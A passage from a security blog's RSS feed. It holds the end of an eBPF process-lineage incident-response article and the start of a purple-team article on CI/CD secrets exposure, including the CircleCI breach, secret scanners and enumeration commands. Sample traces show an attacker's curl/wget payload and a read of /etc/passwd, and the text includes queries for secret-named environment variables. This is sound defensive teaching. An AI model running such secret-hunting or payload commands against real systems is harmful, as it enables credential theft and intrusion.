<p><strong><code class="" data-line="">task_struct</code> in BPF maps</strong> — Tetragon doesn&#8217;t store the raw <code class="" data-line="">task_struct</code> pointer in its maps (pointers are not stable across process lifetime). Instead, it stores a snapshot of the relevant fields (PID, binary path, arguments, capabilities, cgroup path, start time) at the moment of the exec event, keyed by PID. When the process exits, the entry is kept in the cache for a configurable window to allow late-arriving events (like file closes or connection terminations) to be correlated back to the originating process.</p>
</blockquote>
<p>To inspect Tetragon&#8217;s process cache directly:</p>
<pre><code class="" data-line=""># Find the Tetragon process cache map
bpftool map list | grep process_cache

# 112: hash  name process_cache  flags 0x0
#      key 4B  value 256B  max_entries 65536  memlock 16777216B

# Dump a few entries
bpftool map dump id 112 | head -60

# [{
#     &quot;key&quot;: 18293,                           # ← PID
#     &quot;value&quot;: {
#         &quot;binary&quot;: &quot;/bin/sh&quot;,
#         &quot;args&quot;: &quot;sh -c curl http://...&quot;,
#         &quot;pid&quot;: 18293,
#         &quot;ppid&quot;: 18201,
#         &quot;uid&quot;: 1000,
#         &quot;start_time&quot;: 1745296443,
#         &quot;cgroup&quot;: &quot;kubepods/burstable/pod3f8a21bc/.../payments&quot;
#     }
# }]
</code></pre>
<p>The <code class="" data-line="">cgroup</code> field maps directly to the pod — same path as <code class="" data-line="">/proc/&lt;pid&gt;/cgroup</code> but captured at exec time and stored in kernel space.</p>
<hr />
<h2 id="correlating-files-and-connections-to-the-process-tree">Correlating Files and Connections to the Process Tree</h2>
<p>Process lineage is most useful when combined with the file access and network connection events from the same process. Tetragon&#8217;s TracingPolicy supports this multi-event correlation natively:</p>
<pre><code class="" data-line="">apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: observe-process-lineage
spec:
  kprobes:
    # File access: fires on the kernel permission check for an inode
    - call: &quot;security_inode_permission&quot;
      syscall: false
      args:
        - index: 0
          type: &quot;inode&quot;
      selectors:
        - matchNamespaces:
            - namespace: Net
              operator: &quot;NotIn&quot;
              values: [&quot;host_ns&quot;]    # exclude host network namespace (values are namespace inode numbers or host_ns)
          matchActions:
            - action: Post   # audit: log but don&#039;t block
    # Outbound TCP connections
    - call: &quot;tcp_connect&quot;
      syscall: false
      args:
        - index: 0
          type: &quot;sock&quot;
      selectors:
        - matchActions:
            - action: Post
</code></pre>
<p>With this policy active, Tetragon emits events for both file access and TCP connections, each carrying the full process context (PID, binary, pod, parent). Correlated by PID and timestamp:</p>
<pre><code class="" data-line="">tetra getevents | jq &#039;select(.process_kprobe.function_name == &quot;tcp_connect&quot;) |
  {pid: .process_kprobe.process.pid,
   binary: .process_kprobe.process.binary,
   pod: .process_kprobe.process.pod.name,
   dst: .process_kprobe.args[0].sock_arg.daddr}&#039;
</code></pre>
<p>Sample output:</p>
<pre><code class="" data-line="">{&quot;pid&quot;: 18296, &quot;binary&quot;: &quot;/usr/bin/curl&quot;, &quot;pod&quot;: &quot;my-app-6d4f9-xk2p1&quot;, &quot;dst&quot;: &quot;93.184.216.34&quot;}
{&quot;pid&quot;: 18297, &quot;binary&quot;: &quot;/usr/bin/wget&quot;, &quot;pod&quot;: &quot;my-app-6d4f9-xk2p1&quot;, &quot;dst&quot;: &quot;93.184.216.34&quot;}
</code></pre>
<p>PID 18296 and 18297 both connected to the same IP. Cross-reference with the process tree: those are the <code class="" data-line="">curl</code> and <code class="" data-line="">wget</code> spawned by the attacker&#8217;s payload script. The destination IP is the attacker&#8217;s infrastructure. The timeline is milliseconds-precise because the events are timestamped by the kernel at the hook point.</p>
<hr />
<h2 id="building-process-lineage-without-tetragon">Building Process Lineage Without Tetragon</h2>
<p>If you&#8217;re not running Tetragon, you can build a basic process lineage recorder with bpftrace that writes to a file:</p>
<pre><code class="" data-line=""># Record all exec events to a file — run in the background on the node
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_execve {
    printf(&quot;%llu EXEC pid=%-6d ppid=%-6d binary=%s\n&quot;,
           nsecs, pid, curtask-&gt;real_parent-&gt;tgid, str(args-&gt;filename));
}
tracepoint:sched:sched_process_exit {
    printf(&quot;%llu EXIT pid=%-6d comm=%s\n&quot;, nsecs, pid, comm);
}
&#039; &gt; /var/log/process-lineage.log &amp;

# Tail the log for real-time observation
tail -f /var/log/process-lineage.log
</code></pre>
<p>Sample output:</p>
<pre><code class="" data-line="">1745296443123456789 EXEC pid=18293 ppid=18201 binary=/bin/sh
1745296443234567890 EXEC pid=18294 ppid=18293 binary=/bin/sh
1745296443345678901 EXEC pid=18295 ppid=18294 binary=/bin/cat
1745296443456789012 EXIT pid=18295 comm=cat
1745296443567890123 EXEC pid=18296 ppid=18294 binary=/usr/bin/curl
1745296443678901234 EXIT pid=18293 comm=sh
</code></pre>
<p>This file survives pod restarts because it&#8217;s on the node, not in the container. After the pod is restarted, the process lineage record is still on disk. You reconstruct the tree by grouping by <code class="" data-line="">ppid</code> and ordering by timestamp.</p>
<hr />
<h2 id="production-gotchas"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Production Gotchas</h2>
<p><strong>Ringbuf saturation on high-process-churn nodes.</strong> Nodes running serverless workloads or short-lived batch jobs may spawn thousands of processes per minute. Hooking exec on every process at that rate generates a high ringbuf write volume. Filter at the eBPF level by cgroup (namespace) rather than in userspace — sending events to userspace only to discard them wastes ringbuf space and CPU. Tetragon&#8217;s namespace selector does this filtering in the eBPF program before the write.</p>
<p><strong>The 15-character <code class="" data-line="">comm</code> truncation.</strong> The <code class="" data-line="">comm</code> field in <code class="" data-line="">task_struct</code> is limited to 15 characters (plus null terminator). Process names longer than 15 characters are truncated. <code class="" data-line="">bpftrace</code>&#8217;s <code class="" data-line="">comm</code> built-in has the same limit. For the full binary path, read from <code class="" data-line="">execve</code>&#8217;s <code class="" data-line="">filename</code> argument at the tracepoint, not from <code class="" data-line="">comm</code>.</p>
<p><strong>PID reuse.</strong> Linux PIDs are reused after a process exits. In a high-churn environment, a PID you recorded as an attacker process may be reassigned to a legitimate process seconds later. Always pair PIDs with start time and cgroup path when correlating across events. Tetragon&#8217;s process cache is keyed by PID, so it stores the start time in each entry for exactly this reason.</p>
<p><strong>Exec chains lose argument history.</strong> When <code class="" data-line="">execve</code> replaces the process image, <code class="" data-line="">task_struct-&gt;comm</code> changes but the PID does not. If the attacker&#8217;s shell runs <code class="" data-line="">exec bash</code> to replace itself with a less suspicious binary name, the exec event captures the new binary — but the PID lineage still shows the parent correctly. Don&#8217;t rely on <code class="" data-line="">comm</code> alone for process identity; always track the binary path from the exec event.</p>
<p><strong>Process events don&#8217;t capture file content.</strong> You see that <code class="" data-line="">/bin/cat /etc/passwd</code> ran. You don&#8217;t see what was in <code class="" data-line="">/etc/passwd</code> at that moment unless you also capture file open/read events. Tetragon&#8217;s <code class="" data-line="">security_inode_permission</code> hook tells you which files were accessed; capturing their content requires additional hooks on <code class="" data-line="">vfs_read</code> with buffer capture, which is significantly higher overhead and requires careful data handling for sensitive files.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>What you want</th>
<th>Command</th>
</tr>
</thead>
<tbody>
<tr>
<td>Live exec trace (bpftrace)</td>
<td><code class="" data-line="">bpftrace -e &#039;tracepoint:syscalls:sys_enter_execve { printf(...) }&#039;</code></td>
</tr>
<tr>
<td>Fork + exec tree</td>
<td>Combine <code class="" data-line="">sys_exit_clone</code> + <code class="" data-line="">sys_enter_execve</code> traces, correlate by pid/ppid</td>
</tr>
<tr>
<td>Tetragon process events</td>
<td><code class="" data-line="">tetra getevents --event-types PROCESS_EXEC</code></td>
</tr>
<tr>
<td>Tetragon file + network</td>
<td><code class="" data-line="">tetra getevents --event-types PROCESS_KPROBE</code></td>
</tr>
<tr>
<td>Process cache map</td>
<td><code class="" data-line="">bpftool map list | grep process_cache</code> → <code class="" data-line="">bpftool map dump id N</code></td>
</tr>
<tr>
<td>Map PID to pod</td>
<td><code class="" data-line="">cat /proc/&lt;pid&gt;/cgroup</code> → extract pod UID</td>
</tr>
<tr>
<td>Process exit events</td>
<td><code class="" data-line="">tracepoint:sched:sched_process_exit</code></td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Process event</th>
<th>Kernel hook</th>
</tr>
</thead>
<tbody>
<tr>
<td>New process spawned</td>
<td><code class="" data-line="">tracepoint:syscalls:sys_exit_clone</code> (<code class="" data-line="">args-&gt;ret</code> &gt; 0 = child PID)</td>
</tr>
<tr>
<td>Binary executed</td>
<td><code class="" data-line="">tracepoint:syscalls:sys_enter_execve</code></td>
</tr>
<tr>
<td>Process exited</td>
<td><code class="" data-line="">tracepoint:sched:sched_process_exit</code></td>
</tr>
<tr>
<td>File opened</td>
<td><code class="" data-line="">tracepoint:syscalls:sys_enter_openat</code></td>
</tr>
<tr>
<td>Network connect</td>
<td><code class="" data-line="">kprobe:tcp_connect</code></td>
</tr>
<tr>
<td>DNS query</td>
<td><code class="" data-line="">tracepoint:syscalls:sys_enter_sendto</code> (port 53)</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>Process lineage with eBPF hooks <code class="" data-line="">fork</code> and <code class="" data-line="">exec</code> at the kernel level — every process spawned on a node is recorded with its parent PID, binary path, arguments, and container context, regardless of what the container does to suppress application logs</li>
<li>The kernel&#8217;s <code class="" data-line="">task_struct</code> is the authoritative source of process identity; eBPF programs read it at hook time and snapshot the relevant fields into BPF maps before the process can exit or be killed</li>
<li>Tetragon maintains a live process tree in BPF maps, correlates it with Kubernetes metadata, and makes it queryable by pod/namespace — the record persists after the pod is restarted</li>
<li>Incident reconstruction requires correlating process lineage with file access events and network connection events, all correlated by PID and timestamp — eBPF provides all three event streams from the same kernel attachment mechanism</li>
<li>PID reuse is a real concern in high-churn environments; always pair PIDs with start time and cgroup path when correlating across events</li>
<li>Kernel-level process events cannot be suppressed by a compromised container process — an attacker with root inside the container still cannot prevent bpftrace or Tetragon running on the host from recording their syscalls</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>EP14 is the payoff episode for the entire series arc so far. You&#8217;ve seen programs load (EP04), maps hold state (EP05), CO-RE keep programs portable (EP06), XDP and TC enforce at the network layer (EP07, EP08), bpftrace ask one-off questions (EP09), and the observability stack collect flow, DNS, and process data continuously (EP10, EP11, EP12, EP13).</p>
<p>EP14 synthesises all of it into four commands that tell you everything about any cluster you&#8217;ve never seen before — any eBPF-based tool, any vendor, any configuration. The audit playbook is what you run in the first 10 minutes when you inherit a cluster and need to understand what&#8217;s enforcing policy at the kernel level before you can trust anything it tells you.</p>
<p><em>Next: <a href="/ebpf-audit-playbook/">the audit playbook — four commands to see any cluster</a></em></p>
<p>Get EP14 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" 
href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&#038;title=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" data-a2a-url="https://linuxcent.com/ebpf-process-lineage-incident-response/" data-a2a-title="Process Lineage — Reconstructing What Happened After the Fact"></a></p><p>The post <a href="https://linuxcent.com/ebpf-process-lineage-incident-response/">Process Lineage — Reconstructing What Happened After the Fact</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/ebpf-process-lineage-incident-response/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1842</post-id>	</item>
		<item>
		<title>CI/CD Secrets Exposure: How Supply Chain Attacks Target Your Pipeline</title>
		<link>https://linuxcent.com/cicd-secrets-exposure-supply-chain/</link>
					<comments>https://linuxcent.com/cicd-secrets-exposure-supply-chain/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Tue, 16 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[Purple Team]]></category>
		<category><![CDATA[CI/CD]]></category>
		<category><![CDATA[CircleCI]]></category>
		<category><![CDATA[DevSecOps]]></category>
		<category><![CDATA[GitHub Actions]]></category>
		<category><![CDATA[Secrets Management]]></category>
		<category><![CDATA[Supply Chain Security]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1858</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 11</span> <span class="rt-label rt-postfix">minutes</span></span>CI/CD secrets exposure is structural, not behavioral. How CircleCI and GitHub Actions breaches happened and how pre-commit hooks plus secrets scanning close the path permanently.</p>
<p>The post <a href="https://linuxcent.com/cicd-secrets-exposure-supply-chain/">CI/CD Secrets Exposure: How Supply Chain Attacks Target Your Pipeline</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 11</span> <span class="rt-label rt-postfix">minutes</span></span><style>
/* Code blocks: dark panel, monospace stack, grey accent stripe on the left.
   position:relative anchors the absolutely positioned badge and copy button. */
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
/* Inline code gets a light chip; code nested in a pre inherits the dark panel instead */
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
/* Accent stripe colour per data-lang value: shells */
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
/* Config / data formats */
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
/* Programming languages */
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
/* Plain text / command output */
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
/* Copy button: pinned top-right, invisible (opacity 0) until the pre is hovered */
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
/* State class applied after a successful copy */
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
/* Language badge: pinned top-left, shown on hover, never intercepts clicks */
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
/* Tables: full width, bordered cells, shaded header, zebra-striped rows */
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  // Run-once guard: the flag on window stops a second copy of this snippet
  // on the same page from decorating the code blocks again.
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  // Text to place on the clipboard for one pre element. Prefers the inner
  // code element; without one, reads a clone of the pre with the injected
  // badge/button removed so the button label is not part of the copied text.
  function snippetText(pre,code){
    if(code)return code.innerText;
    var clone=pre.cloneNode(true);
    clone.querySelectorAll('.lc-copy-btn,.lc-lang-badge').forEach(function(el){el.parentNode.removeChild(el);});
    return clone.textContent;
  }
  // Decorates every pre element: sets data-lang and adds a language badge when
  // the code element carries a language-xxx class, then appends a Copy button.
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=snippetText(pre,code);
        // The async Clipboard API is used only in a secure context; otherwise,
        // or when writeText rejects, fall back to the hidden-textarea copy.
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  // Success feedback: label and class change for two seconds, then reset.
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  // Fallback copy through an off-screen textarea and execCommand.
  // execCommand reports failure by returning false (it does not have to throw),
  // so success feedback is shown only on a true result, and the textarea is
  // always removed, even when an exception is raised.
  function fb(text,btn){
    var ta=document.createElement('textarea');
    var copied=false;
    try{
      ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';
      document.body.appendChild(ta);ta.select();
      copied=document.execCommand('copy');
    }catch(e){copied=false;}
    finally{if(ta.parentNode)ta.parentNode.removeChild(ta);}
    if(copied){ok(btn);}
    else{btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  // Decorate now if the DOM is already parsed, otherwise wait for it.
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><a href="/what-is-purple-team-security/">What is purple team security</a> → <a href="/owasp-top-10-cloud-infrastructure/">OWASP Top 10 mapped to cloud infrastructure</a> → <a href="/cloud-security-breaches-2020-2025/">Cloud security breaches 2020–2025</a> → <a href="/broken-access-control-aws/">Broken access control in AWS</a> → <a href="/mfa-fatigue-attack/">MFA fatigue attacks</a> → <strong>CI/CD secrets exposure</strong></p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li><strong>CI/CD secrets exposure</strong> is OWASP A08 + A02: credentials committed to repositories or stored in pipeline environment variables can be exfiltrated when the platform is compromised, and automated scanners find them within seconds of a public commit</li>
<li>The CircleCI breach (January 2023): an engineer&#8217;s laptop was compromised via malware → session token stolen → attacker accessed CircleCI production systems → all customer environment variables (AWS keys, GitHub tokens, SSH keys) exfiltrated</li>
<li>The structural problem: long-lived credentials stored in a CI/CD platform are only as secure as the platform itself — if the platform is compromised, all stored secrets are compromised</li>
<li>The structural fix: <a href="/oidc-workload-identity-eliminate-cloud-access-keys/">OIDC workload identity</a> replaces stored credentials with short-lived tokens issued at job runtime — there is nothing to exfiltrate</li>
<li>Pre-commit hooks and CI-layer secret scanning are detection layers, not structural fixes — they catch accidents, not determined attackers</li>
<li>Automated secret scanners (TruffleHog, Gitleaks) find credentials in public repos within 60–90 seconds of commit</li>
</ul>
<hr />
<blockquote>
<p><strong>OWASP Mapping:</strong> A08 Software and Data Integrity Failures — build pipeline integrity. A02 Cryptographic Failures — secrets stored in ways that allow exfiltration.</p>
</blockquote>
<hr />
<h2 id="the-big-picture">The Big Picture</h2>
<pre><code class="" data-line="">┌─────────────────────────────────────────────────────────────────────┐
│                  CI/CD SECRETS ATTACK SURFACE                       │
│                                                                     │
│   VECTOR 1: COMMITTED TO VCS                                        │
│   Developer ── git commit ──&#x25b6; .env with AWS_SECRET_KEY              │
│   Automated scanner ──────&#x25b6;  clones within 60 seconds              │
│   Attacker ───────────────&#x25b6;  accesses AWS before dev notices        │
│                                                                     │
│   VECTOR 2: STORED IN CI/CD PLATFORM                                │
│   DevOps ─── configures ──&#x25b6;  AWS_ACCESS_KEY_ID in CircleCI         │
│   Attacker compromises CircleCI → exfiltrates all org env vars      │
│                                                                     │
│   VECTOR 3: IN CONTAINER/PROCESS ENV                                │
│   kubectl exec / docker inspect ──&#x25b6;  printenv shows credentials     │
│   Anyone with container exec access = credential access             │
│                                                                     │
│   VECTOR 4: IN BUILD ARTIFACTS / LOGS                               │
│   Build log: &quot;Using token: ghp_xxxxxxxxxxxx...&quot; → exposed in log   │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│   STRUCTURAL FIX: OIDC WORKLOAD IDENTITY                            │
│   No stored credential → nothing to commit, nothing to exfiltrate  │
│   CI job requests token at runtime → 1-hour TTL → expired          │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘
</code></pre>
<p><strong>CI/CD secrets exposure</strong> is not primarily a developer discipline problem — it is a structural problem. When credentials are stored in a CI/CD platform, in environment variables, or in version control, the only question is when they will be exposed, not whether. The structural answer replaces stored credentials with dynamically issued, short-lived tokens that cannot be exfiltrated because they don&#8217;t persist.</p>
<hr />
<h2 id="the-25-minute-compromise-how-automated-scanning-works-against-you">The 25-Minute Compromise: How Automated Scanning Works Against You</h2>
<p>At 2:47 AM, a developer committed a <code class="" data-line="">.env</code> file to a public GitHub repository. It contained:</p>
<pre><code class="" data-line="">DATABASE_URL=postgres://admin:prod_p@ssw0rd@db.internal.company.com:5432/customers
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
STRIPE_SECRET_KEY=sk_live_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
GITHUB_TOKEN=ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
</code></pre>
<p>At 2:48 AM — 60 seconds later — an automated scanner had cloned the repository. These scanners run continuously against GitHub&#8217;s public event stream, looking for credential patterns in new commits, new files, and new repository forks.</p>
<p>At 3:12 AM — 25 minutes after the commit — the database started receiving unusual queries. The automated scanning infrastructure is not operated by individuals manually watching for leaks. It is fully automated: pattern match → clone → test credential validity → if valid, begin exploitation or sell.</p>
<p>GitHub now runs its own secret scanning and immediately invalidates some credential types (GitHub tokens, AWS IAM keys partnered with AWS) when detected in public repositories. This covers a subset of credential types. It does not cover database passwords, service-specific tokens for non-partnered services, or private repository commits that become public via fork.</p>
<hr />
<h2 id="the-circleci-breach-platform-level-credential-exfiltration">The CircleCI Breach: Platform-Level Credential Exfiltration</h2>
<p>The CircleCI breach (January 2023) is the definitive example of CI/CD platform-level secrets exposure. The attack chain:</p>
<pre><code class="" data-line="">1. CircleCI engineer&#039;s laptop compromised via malware (initial vector not fully disclosed)
2. Malware steals a 2FA-authenticated SSO session token
3. Session token valid, not expired
4. Attacker uses session token to authenticate to CircleCI internal systems
5. From internal access, attacker reaches production database
6. Production database contains encrypted customer secrets (environment variables)
7. Database also contains the encryption keys (in accessible internal system)
8. Attacker exfiltrates: encrypted secrets + encryption keys = plaintext secrets
</code></pre>
<p><strong>What was stored in CircleCI environment variables by customers:</strong><br />
&#8211; AWS IAM access key ID and secret access key pairs<br />
&#8211; GitHub personal access tokens and OAuth tokens<br />
&#8211; DockerHub credentials<br />
&#8211; SSH private keys (for deployment access)<br />
&#8211; Heroku API keys<br />
&#8211; Stripe, Twilio, SendGrid API keys<br />
&#8211; Internal service account credentials</p>
<p>CircleCI could not determine which customer secrets were accessed and which were not — they notified all customers to rotate all credentials stored in their system.</p>
<p><strong>The scale of the blast radius:</strong> Any customer who had stored long-lived credentials in CircleCI environment variables was potentially compromised. Because those credentials were long-lived, they remained valid after exfiltration until the customer rotated them. The CircleCI platform&#8217;s encryption only protected against offline attacks — an attacker with internal database access and access to the key management system had everything needed to decrypt.</p>
<hr />
<h2 id="red-phase-enumerating-secrets-exposure-in-your-pipeline">Red Phase: Enumerating Secrets Exposure in Your Pipeline</h2>
<h3 id="scanning-repositories-for-committed-secrets">Scanning Repositories for Committed Secrets</h3>
<pre><code class="" data-line=""># Install TruffleHog v3: brew install trufflehog (or download a release binary), or use the Docker image
docker run --rm \
  -v &quot;$(pwd):/repo&quot; \
  trufflesecurity/trufflehog:latest \
  git file:///repo \
  --json \
  --only-verified \
  2&gt;/dev/null | \
  jq &#039;{
    file: .SourceMetadata.Data.Git.file,
    commit: .SourceMetadata.Data.Git.commit,
    detector: .DetectorName,
    verified: .Verified,
    line: .SourceMetadata.Data.Git.line
  }&#039;
</code></pre>
<pre><code class="" data-line=""># Gitleaks: alternative scanner with SARIF output for CI integration
gitleaks detect \
  --source . \
  --report-format sarif \
  --report-path gitleaks-report.sarif \
  --verbose

# Or: scan entire git history (catches secrets that were committed then deleted)
gitleaks detect \
  --source . \
  --log-opts=&quot;--all&quot; \
  --report-format json \
  --report-path gitleaks-history.json
</code></pre>
<pre><code class="" data-line=""># Scan a specific GitHub organization&#039;s public repositories
# (test your own org before red team exercises)
trufflehog github \
  --org your-github-org \
  --token &quot;${GITHUB_TOKEN}&quot; \
  --json \
  --only-verified \
  2&gt;/dev/null | \
  jq &#039;{
    repo: .SourceMetadata.Data.Github.repository,
    file: .SourceMetadata.Data.Github.file,
    detector: .DetectorName,
    verified: .Verified
  }&#039;
</code></pre>
<h3 id="enumerating-secrets-in-cicd-platform-environment-variables">Enumerating Secrets in CI/CD Platform Environment Variables</h3>
<pre><code class="" data-line=""># GitHub Actions: list secrets defined in a repository
# (shows names only — values are not returned by API, but names reveal what&#039;s stored)
curl -H &quot;Authorization: Bearer ${GITHUB_TOKEN}&quot; \
  -H &quot;Accept: application/vnd.github+json&quot; \
  &quot;https://api.github.com/repos/your-org/your-repo/actions/secrets&quot; | \
  jq &#039;.secrets[] | {name: .name, updated: .updated_at}&#039;

# GitHub Actions: list organization-level secrets
curl -H &quot;Authorization: Bearer ${GITHUB_TOKEN}&quot; \
  -H &quot;Accept: application/vnd.github+json&quot; \
  &quot;https://api.github.com/orgs/your-org/actions/secrets&quot; | \
  jq &#039;.secrets[] | {name: .name, visibility: .visibility, updated: .updated_at}&#039;
</code></pre>
<pre><code class="" data-line=""># Check for credentials in running pod environment variables (Kubernetes)
# This is what an attacker with get/list access to pods could run (kubectl exec is not required)
kubectl get pods -A -o json | \
  jq -r &#039;.items[] | 
    .metadata.namespace + &quot;/&quot; + .metadata.name + &quot;: &quot; + 
    ([.spec.containers[].env[]? | 
      select(.name | test(&quot;KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL|API&quot;; &quot;i&quot;)) |
      .name
    ] | join(&quot;, &quot;))&#039; | \
  grep -v &quot;: $&quot;  # Only show pods with matching env var names
</code></pre>
<h3 id="testing-whether-aws-keys-in-cicd-are-over-permissioned">Testing Whether AWS Keys in CI/CD Are Over-Permissioned</h3>
<pre><code class="" data-line=""># If you find an AWS access key in a scan — test its permissions
# (on your own test account&#039;s keys only)
aws sts get-caller-identity
# Returns: account, user/role ARN, caller ID

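# What can this key do?
# (simulate-principal-policy does not accept wildcards in action names — list concrete actions)
aws iam simulate-principal-policy \
  --policy-source-arn $(aws sts get-caller-identity --query Arn --output text) \
  --action-names &quot;s3:GetObject&quot; &quot;s3:PutObject&quot; &quot;ec2:RunInstances&quot; &quot;iam:CreateAccessKey&quot; &quot;iam:AttachUserPolicy&quot; &quot;sts:AssumeRole&quot; \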
  --query &#039;EvaluationResults[?EvalDecision==`allowed`].EvalActionName&#039; \
  --output text
